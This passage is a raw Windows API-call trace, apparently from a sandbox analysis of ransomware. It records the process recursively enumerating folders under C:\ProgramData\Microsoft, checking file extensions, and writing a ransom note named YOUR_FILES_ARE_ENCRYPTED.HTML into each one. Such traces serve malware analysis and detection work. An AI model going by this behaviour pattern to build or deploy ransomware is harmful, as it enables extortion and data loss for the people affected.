(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.388] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.389] CloseHandle (hObject=0x32c) returned 1 [0106.390] GetProcessHeap () returned 0x600000 [0106.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0106.390] GetProcessHeap () returned 0x600000 [0106.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0106.391] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="temp", cAlternateFileName="")) returned 0 [0106.391] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0106.391] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0106.391] GetProcessHeap () returned 0x600000 [0106.391] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.392] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.393] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.395] CloseHandle (hObject=0x314) returned 1 [0106.395] GetProcessHeap () returned 0x600000 [0106.395] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.395] GetProcessHeap () returned 0x600000 [0106.395] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.397] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="production", cAlternateFileName="PRODUC~1")) returned 0 [0106.397] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.397] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0106.397] GetProcessHeap () returned 0x600000 [0106.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\identitycrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.398] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.399] CloseHandle (hObject=0x308) returned 1 [0106.400] GetProcessHeap () returned 0x600000 [0106.400] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.400] GetProcessHeap () returned 0x600000 [0106.400] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.401] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="MapData", cAlternateFileName="")) returned 1 [0106.401] StrStrIW (lpFirst="MapData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.401] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MapData") returned 36 [0106.401] GetProcessHeap () returned 0x600000 [0106.401] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.402] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MapData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MapData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MapData" [0106.402] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MapData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\*" [0106.402] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0106.402] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.402] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 0 [0106.402] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0106.403] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0106.403] GetProcessHeap () returned 0x600000 [0106.403] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.403] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\mapdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.404] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.406] CloseHandle (hObject=0x308) returned 1 [0106.406] GetProcessHeap () returned 0x600000 [0106.406] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.406] GetProcessHeap () returned 0x600000 [0106.406] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.407] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="MF", cAlternateFileName="")) returned 1 [0106.407] StrStrIW (lpFirst="MF", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.407] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned 31 [0106.407] GetProcessHeap () returned 0x600000 [0106.407] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.408] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF" [0106.408] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*" [0106.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0106.409] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.409] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0106.409] StrStrIW (lpFirst="Active.GRL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.409] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0106.409] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0106.409] lstrlenW (lpString=".GRL") returned 4 [0106.409] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0106.409] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0106.409] StrStrIW (lpFirst="Pending.GRL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.409] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0106.409] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0106.409] lstrlenW (lpString=".GRL") returned 4 [0106.409] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0106.409] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0106.409] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0106.409] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0106.409] GetProcessHeap () returned 0x600000 [0106.409] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.410] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\mf\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.412] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.413] CloseHandle (hObject=0x308) returned 1 [0106.413] GetProcessHeap () returned 0x600000 [0106.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.413] GetProcessHeap () returned 0x600000 [0106.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.414] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0106.414] StrStrIW (lpFirst="NetFramework", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.414] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned 41 [0106.414] GetProcessHeap () returned 0x600000 [0106.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.415] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework" [0106.415] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*" [0106.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0106.416] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.416] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0106.416] StrStrIW (lpFirst="BreadcrumbStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.416] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned 57 [0106.416] GetProcessHeap () returned 0x600000 [0106.416] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.417] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore" [0106.417] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*" [0106.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.418] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.418] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 0 [0106.418] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.418] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0106.418] GetProcessHeap () returned 0x600000 [0106.418] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.418] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.419] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.420] CloseHandle (hObject=0x314) returned 1 [0106.421] GetProcessHeap () returned 0x600000 [0106.421] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.421] GetProcessHeap () returned 0x600000 [0106.421] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.422] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0 [0106.422] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0106.422] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0106.422] GetProcessHeap () returned 0x600000 [0106.422] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.423] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\netframework\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.423] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.424] CloseHandle (hObject=0x308) returned 1 [0106.425] GetProcessHeap () returned 0x600000 [0106.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.425] GetProcessHeap () returned 0x600000 [0106.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.426] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Network", cAlternateFileName="")) returned 1 [0106.426] StrStrIW (lpFirst="Network", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.426] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network") returned 36 [0106.426] GetProcessHeap () returned 0x600000 [0106.426] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 